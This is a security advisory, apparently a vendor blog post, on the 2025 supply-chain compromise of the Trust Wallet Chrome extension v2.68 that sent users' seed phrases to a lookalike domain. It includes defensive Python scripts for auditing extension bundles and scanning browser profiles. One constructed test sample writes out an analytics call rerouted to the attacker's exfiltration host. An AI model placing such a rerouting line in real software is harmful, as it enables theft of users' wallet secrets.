
Trust Wallet Chrome Extension Supply Chain Attack: $7 Million Cryptocurrency Theft via Compromised v2.68 Update

  • Rescana
  • 23 hours ago
  • 6 min read

Executive Summary

On December 24, 2025, a critical security incident affected the Trust Wallet Chrome browser extension, resulting in the theft of approximately $7 million in cryptocurrency assets. The breach was traced to version 2.68 of the extension, which was compromised through the use of a leaked Chrome Web Store API key. This allowed an attacker to bypass Trust Wallet’s internal release process and distribute a malicious update directly to users via the Chrome Web Store. The malicious code exfiltrated users’ mnemonic phrases (seed phrases) to an attacker-controlled server, enabling unauthorized access and theft of funds from hundreds of victims. The incident is limited to Chrome extension users who installed or logged into version 2.68 before December 26, 2025, 11 a.m. UTC. Trust Wallet and its parent company, Binance, have committed to reimbursing affected users and have urged immediate updates to version 2.69. There is no evidence that mobile-only users or other browser extension versions are impacted. The attack highlights the growing risk of supply chain compromises in the cryptocurrency sector and underscores the importance of robust release and credential management processes. All information in this summary is directly supported by the cited sources below.

Technical Information

The attack on the Trust Wallet Chrome extension represents a sophisticated supply chain compromise, exploiting weaknesses in the software deployment process. The attacker obtained a leaked Chrome Web Store API key, which is a credential used by developers to publish and update browser extensions on the Chrome Web Store. By leveraging this key, the attacker was able to upload a malicious version (2.68) of the Trust Wallet extension, bypassing the vendor’s internal manual release checks and controls. This malicious update was published on December 24, 2025, at 12:32 p.m. UTC and was automatically distributed to users via the Chrome Web Store’s update mechanism.

The injected malicious code was embedded within the extension’s analytics logic. Upon installation or login, the code iterated through all wallets stored in the extension and triggered a request for each wallet’s mnemonic phrase. The mnemonic, which is encrypted by default, was decrypted using the password or passkey entered by the user during wallet unlock. Once decrypted, the mnemonic phrase was exfiltrated to an attacker-controlled server at api.metrics-trustwallet[.]com. The domain metrics-trustwallet[.]com was registered on December 8, 2025, and the first exfiltration request was observed on December 21, 2025. The attacker disguised the exfiltration as legitimate analytics traffic by leveraging the open-source posthog-js analytics library, which is commonly used for user behavior tracking. This approach allowed the malicious traffic to blend in with normal extension analytics, reducing the likelihood of immediate detection.
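The disguise described above, analytics traffic rerouted to a brand-lookalike domain, is something a release-time audit of the extension bundle can catch before an update ships. The following Python script is an added example, not code from Trust Wallet, Rescana or the posthog project: it reads an unpacked bundle's manifest.json, collects the declared host permissions and every URL literal in the bundle's JavaScript, and flags hosts that are neither under the vendor's own domain nor on a short third-party allowlist, with a separate verdict for hosts that carry the vendor's brand name outside its domain. The vendor domain, the allowlist, the brand token and the sample bundle are all constructed for the example, as is the assumption that the analytics client was pointed at the exfiltration host through posthog-js's `api_host` option (the advisory only says posthog-js was used as cover).

```python
"""Audit an unpacked browser-extension bundle for network endpoints outside
the vendor's domains. Added example; the domains and the sample bundle are
constructed, not taken from the real extension."""
import json
import os
import re
import tempfile
from urllib.parse import urlparse

# Assumptions for this example: the vendor's own domain and the third-party
# analytics host it legitimately talks to. Adjust for the bundle under review.
VENDOR_DOMAINS = {"trustwallet.com"}
ALLOWED_THIRD_PARTY = {"posthog.com"}
# A host containing the brand name that is NOT under a vendor domain is a
# lookalike of the kind used as the exfiltration endpoint in this incident.
BRAND_TOKENS = ("trustwallet",)

# URL literals in source; quotes are excluded so the match stops at the string end.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-_:/?#@!$&()*+,;=%~]+")


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def classify_host(host):
    """Classify a hostname relative to the vendor domains and allowlist."""
    host = host.lower().rstrip(".")
    if any(_under(host, d) for d in VENDOR_DOMAINS):
        return "vendor"
    if any(_under(host, d) for d in ALLOWED_THIRD_PARTY):
        return "allowed-third-party"
    if any(tok in host for tok in BRAND_TOKENS):
        return "brand-lookalike"
    return "unknown"


def _host_from_match_pattern(pattern):
    # host_permissions entries look like "*://*.example.com/*"
    rest = pattern.split("://", 1)[-1]
    host = rest.split("/", 1)[0]
    return host[2:] if host.startswith("*.") else host


def audit_bundle(bundle_dir):
    """Return [(relative_file, host, verdict)] for every declared host
    permission and every URL literal in a .js file that is neither a vendor
    domain nor an allowlisted third party."""
    findings = []
    with open(os.path.join(bundle_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    for pattern in manifest.get("host_permissions", []):
        host = _host_from_match_pattern(pattern)
        verdict = classify_host(host)
        if verdict not in ("vendor", "allowed-third-party"):
            findings.append(("manifest.json", host, verdict))
    for root, _dirs, files in os.walk(bundle_dir):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for url in URL_RE.findall(text):
                host = urlparse(url).hostname
                if not host:
                    continue
                verdict = classify_host(host)
                if verdict not in ("vendor", "allowed-third-party"):
                    rel = os.path.relpath(path, bundle_dir).replace(os.sep, "/")
                    findings.append((rel, host, verdict))
    return findings


def build_sample_bundle(target_dir):
    """Write a small CONSTRUCTED bundle modelled on the advisory: one extra host
    permission and an analytics module whose api_host points at a lookalike domain."""
    manifest = {
        "manifest_version": 3,
        "name": "Sample Wallet",
        "version": "2.68",
        "host_permissions": ["*://*.trustwallet.com/*",
                             "*://api.metrics-trustwallet.com/*"],
    }
    with open(os.path.join(target_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(manifest, fh)
    os.makedirs(os.path.join(target_dir, "js"), exist_ok=True)
    analytics_js = (
        'import posthog from "posthog-js";\n'
        "// constructed sample: analytics client rerouted to a lookalike host\n"
        'posthog.init("phc_placeholder", { api_host: "https://api.metrics-trustwallet.com" });\n'
        'fetch("https://api.trustwallet.com/v1/assets");\n'
        'const docs = "https://posthog.com/docs";\n'
    )
    with open(os.path.join(target_dir, "js", "analytics.js"), "w", encoding="utf-8") as fh:
        fh.write(analytics_js)


def run_demo():
    """Build the sample bundle in a temp dir, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_bundle(tmp)
        findings = audit_bundle(tmp)
    for rel, host, verdict in findings:
        print(f"{verdict:18} {host:32} {rel}")
    return findings


if __name__ == "__main__":
    run_demo()
```

On the sample bundle the script reports the lookalike host twice, once from the added host permission and once from the analytics module, while the vendor API call and the genuine posthog.com reference are left alone. Against a real update the same check runs on the unpacked CRX in the release pipeline; a clean result is necessary rather than sufficient, since URLs assembled at runtime from fragments or fetched from a remote config will not appear as literals.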

The stolen mnemonics enabled the attacker to reconstruct private keys and drain funds from affected wallets. Blockchain analysis revealed that the attacker stole approximately $3 million in Bitcoin, $431 in Solana, and more than $3 million in Ethereum. The stolen assets were rapidly laundered through centralized exchanges such as ChangeNOW, FixedFloat, and KuCoin, as well as through cross-chain bridges. As of the latest reports, about $2.8 million of the stolen funds remain in the attacker’s wallets, while over $4 million has been moved to exchanges for further laundering and swapping.

The attack chain can be mapped to several MITRE ATT&CK techniques. Initial access was achieved through supply chain compromise (T1195.002), specifically by compromising the software deployment process. Persistence was maintained by using valid deployment credentials (T1078). Credential access was achieved through input capture (T1056) and credentials from password stores (T1555), as the extension decrypted and exfiltrated mnemonics. Data collection was performed by iterating through all stored wallets (T1213), and exfiltration was conducted over web services (T1567.002) using HTTPS POST requests. Command and control was established via application layer protocols (T1071.001), with the attacker’s server acting as the C2 endpoint.

The technical evidence supporting these findings includes the malicious extension artifact (v2.68), the registration and use of the exfiltration domain, the use of posthog-js for data exfiltration, and blockchain transaction analysis by third-party investigators such as SlowMist, PeckShield, and ZachXBT. The attack did not involve a compromised third-party dependency (such as a malicious npm package), but rather direct tampering with the extension’s own codebase.

Attribution remains inconclusive. There is speculation about possible nation-state involvement or an insider threat, given the method of compromise and the use of a stolen API key. However, there is no direct technical evidence linking the attack to a known advanced persistent threat (APT) group or confirming insider involvement. Confidence in nation-state attribution is low; the insider threat hypothesis is assessed at medium confidence on the basis of the compromise method alone, with no direct evidence to support it.

This incident is consistent with a broader trend of supply chain attacks targeting the cryptocurrency sector, including previous campaigns such as GlassWorm (targeting VS Code extensions) and the FoxyWallet Firefox extension fraud. The use of browser extension supply chain attacks is increasing, as these platforms provide a direct vector to access sensitive user credentials and assets.

Affected Versions & Timeline

The security incident exclusively affects users of the Trust Wallet Chrome extension version 2.68. The malicious version was published to the Chrome Web Store on December 24, 2025, at 12:32 p.m. UTC, following the compromise of the Chrome Web Store API key. The exfiltration domain metrics-trustwallet[.]com was registered on December 8, 2025, and the first observed exfiltration request occurred on December 21, 2025. The attack window is therefore defined as December 24, 2025, 12:32 p.m. UTC (malicious version release) to December 26, 2025, 11 a.m. UTC (public disclosure and update). Only users who installed or logged into the extension during this period are affected. Mobile-only users and users of other browser extension versions are not impacted. The vendor released a fixed version (2.69) and has urged all users to update immediately.

Threat Activity

The threat actor behind this incident demonstrated a high level of sophistication in both the compromise and operational phases of the attack. By obtaining and exploiting a leaked Chrome Web Store API key, the attacker was able to bypass Trust Wallet’s internal release controls and distribute a malicious update directly to end users. The malicious code was carefully crafted to blend in with legitimate analytics logic, leveraging the posthog-js library to disguise exfiltration traffic as normal user behavior tracking. This approach delayed detection and maximized the number of compromised wallets.

Once the mnemonics were exfiltrated, the attacker rapidly drained funds from affected wallets, targeting multiple cryptocurrencies including Bitcoin, Ethereum, and Solana. The stolen assets were laundered through a combination of centralized exchanges and cross-chain bridges, complicating recovery efforts and attribution. Blockchain investigators such as PeckShield and ZachXBT tracked the movement of funds, identifying that approximately $2.8 million remains in the attacker’s wallets, while the remainder has been distributed across various exchanges.

The attack shares technical and operational similarities with previous supply chain attacks in the cryptocurrency sector, such as the GlassWorm campaign and the FoxyWallet Firefox extension fraud. These incidents highlight the increasing use of browser extension supply chain attacks as a vector for credential theft and asset compromise. The use of a stolen deployment credential and direct codebase tampering suggests the attacker had access to internal development or deployment infrastructure, raising the possibility of insider involvement or a highly capable external actor.

There is no confirmed attribution to a specific threat actor or group. While some industry figures have speculated about nation-state involvement or insider threat, there is no direct technical evidence to support these claims. The attack methodology is consistent with both sophisticated cybercriminal and advanced persistent threat (APT) operations, but the available evidence does not allow for high-confidence attribution.

Mitigation & Workarounds

The following mitigation actions are prioritized by severity:

Critical: All users of the Trust Wallet Chrome extension must immediately update to version 2.69 or later. The malicious version 2.68 should be uninstalled, and users should avoid interacting with any messages or forms not originating from official Trust Wallet channels. Users who installed or logged into version 2.68 between December 24, 2025, and December 26, 2025, 11 a.m. UTC should assume their mnemonic phrase has been compromised and should transfer assets to a new wallet generated with a new seed phrase.

High: Affected users should complete the compensation form provided by Trust Wallet at trustwallet-support.freshdesk[.]com, supplying the required information (contact email, country of residence, compromised wallet address, destination address, and transaction hashes) to initiate the reimbursement process. Users should remain vigilant for phishing attempts, including fake compensation forms, impersonated support accounts, and unsolicited direct messages.

Medium: Organizations and individuals using browser-based cryptocurrency wallets should review and strengthen their software supply chain security practices. This includes securing deployment credentials, implementing multi-factor authentication for release processes, and conducting regular code audits and integrity checks.

Low: Users should monitor official Trust Wallet and Binance communication channels for updates and advisories. It is recommended to avoid using browser extensions for high-value cryptocurrency storage and to consider hardware wallets or mobile-only solutions for enhanced security.
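For the Critical action above, an operator first needs to know which machines and browser profiles still carry version 2.68. The following Python script is an added example, not Trust Wallet's or Rescana's tooling: it walks a Chrome user-data directory (`<profile>/Extensions/<id>/<version>_<n>/manifest.json`), resolves localized extension names from the bundle's `_locales` folder, and reports every extension whose name contains "Trust Wallet" together with whether the installed version is the compromised 2.68. Because the advisory does not give the store extension ID, matching is by manifest name; the sample profile tree, the extension IDs and the manifest contents are constructed for the demo.

```python
"""Inventory Chrome profiles for installed Trust Wallet extension versions.
Added example; the user-data tree it scans in the demo is constructed."""
import json
import os
import tempfile

# Assumptions for this example: the extension is recognised by its manifest
# name (the advisory does not give the store ID) and only 2.68 is compromised.
NAME_MARKER = "trust wallet"
COMPROMISED_VERSIONS = {"2.68"}


def _resolve_name(manifest, version_dir):
    """Resolve a '__MSG_key__' manifest name from the default locale's messages.json."""
    name = manifest.get("name", "")
    if name.startswith("__MSG_") and name.endswith("__"):
        key = name[6:-2]
        locale = manifest.get("default_locale", "en")
        path = os.path.join(version_dir, "_locales", locale, "messages.json")
        try:
            with open(path, encoding="utf-8") as fh:
                name = json.load(fh).get(key, {}).get("message", name)
        except OSError:
            pass
    return name


def scan_user_data(user_data_dir):
    """Walk <profile>/Extensions/<id>/<version>_<n>/manifest.json and return
    [(profile, ext_id, name, version, compromised)] for matching extensions."""
    results = []
    for profile in sorted(os.listdir(user_data_dir)):
        ext_root = os.path.join(user_data_dir, profile, "Extensions")
        if not os.path.isdir(ext_root):
            continue
        for ext_id in sorted(os.listdir(ext_root)):
            id_dir = os.path.join(ext_root, ext_id)
            if not os.path.isdir(id_dir):
                continue
            for version_folder in sorted(os.listdir(id_dir)):
                version_dir = os.path.join(id_dir, version_folder)
                manifest_path = os.path.join(version_dir, "manifest.json")
                if not os.path.isfile(manifest_path):
                    continue
                with open(manifest_path, encoding="utf-8") as fh:
                    manifest = json.load(fh)
                name = _resolve_name(manifest, version_dir)
                if NAME_MARKER not in name.lower():
                    continue
                version = manifest.get("version", "")  # manifest is authoritative
                results.append((profile, ext_id, name, version,
                                version in COMPROMISED_VERSIONS))
    return results


def build_sample_user_data(root):
    """Construct a small user-data tree: one profile with the compromised version
    (localized name), one with the fixed version, plus an unrelated extension."""
    wallet_id = "a" * 32  # placeholder; real Chrome IDs are 32 letters a-p
    other_id = "b" * 32
    layout = [
        ("Default", wallet_id, "2.68", {"name": "__MSG_appName__", "default_locale": "en"}),
        ("Profile 1", wallet_id, "2.69", {"name": "Trust Wallet"}),
        ("Profile 1", other_id, "1.0.3", {"name": "Sample Notes"}),
    ]
    for profile, ext_id, version, extra in layout:
        vdir = os.path.join(root, profile, "Extensions", ext_id, f"{version}_0")
        os.makedirs(vdir, exist_ok=True)
        manifest = {"manifest_version": 3, "version": version, **extra}
        with open(os.path.join(vdir, "manifest.json"), "w", encoding="utf-8") as fh:
            json.dump(manifest, fh)
        if manifest["name"].startswith("__MSG_"):
            ldir = os.path.join(vdir, "_locales", "en")
            os.makedirs(ldir, exist_ok=True)
            with open(os.path.join(ldir, "messages.json"), "w", encoding="utf-8") as fh:
                json.dump({"appName": {"message": "Trust Wallet"}}, fh)


def run_demo():
    """Build the sample tree in a temp dir, scan it and return the results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_user_data(tmp)
        results = scan_user_data(tmp)
    for profile, ext_id, name, version, bad in results:
        status = "COMPROMISED: update and move funds to a new seed" if bad else "ok"
        print(f"{profile:10} {name:14} {version:6} {status}")
    return results


if __name__ == "__main__":
    run_demo()
```

To run it against a real machine, call `scan_user_data` with the Chrome user-data directory (`~/.config/google-chrome` on Linux, `~/Library/Application Support/Google/Chrome` on macOS, `%LOCALAPPDATA%\Google\Chrome\User Data` on Windows). A 2.68 directory shows that version was installed; whether the user logged in during the window the advisory ties exposure to needs other evidence, so any 2.68 hit should be handled as if the seed phrase were exposed.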

References

https://thehackernews.com/2025/12/trust-wallet-chrome-extension-bug.html

https://www.coindesk.com/business/2025/12/26/trust-wallet-users-lose-more-than-usd7-million-to-hacked-chrome-extension

https://fluidattacks.com/blog/glassworm-vs-code-extensions-supply-chain-attack

https://www.mishcon.com/news/firefox-cryptocurrency-extension-fraud-campaign

About Rescana

Rescana provides a Third-Party Risk Management (TPRM) platform designed to help organizations identify, assess, and monitor risks in their software supply chain and vendor ecosystem. Our platform enables continuous monitoring of third-party software components, detection of credential exposures, and assessment of supply chain vulnerabilities. For questions or further information, please contact us at ops@rescana.com.
